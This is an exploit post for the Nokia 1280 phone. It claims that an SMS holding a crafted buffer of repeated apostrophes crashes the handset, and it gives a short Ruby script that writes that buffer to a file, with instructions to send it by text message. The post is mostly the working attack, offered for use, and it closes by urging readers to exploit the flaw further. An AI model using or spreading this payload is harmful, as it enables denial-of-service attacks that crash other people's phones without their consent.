########################################################################################################### #Exploit Title: Nokia 1280 DoS Vulnerability #Author : Un0wn_X #E-Mail : unownsec@gmail.com #Date : Monday, July 01,2013 #Product: http://www.nokia.com/in-en/phones/phone/nokia-1280/ ########################################################################################################### #Vulnerability Advisory ======================= You can send a SMS containing the malicious buffer and can crash the phone once it loads in the memory. #Video PoC ============ http://www.youtube.com/watch?v=csLuNZ0mjpI #Exploit ========= #!/usr/bin/env ruby #Author: Un0wn_X begin buff = "Don't Scroll Down :D \n\n" buff += "'"*100 file = open("exploit.txt","w") file.write(buff) file.close() puts "[+] Exploit created >> exploit.txt" puts "[*] Now send the text contained inside the exploit.txt by a sms" puts "[~] Un0wn_X" end #Final Notes ============= I have no idea to attach this to a debugger and fuzz this system. You may exploit further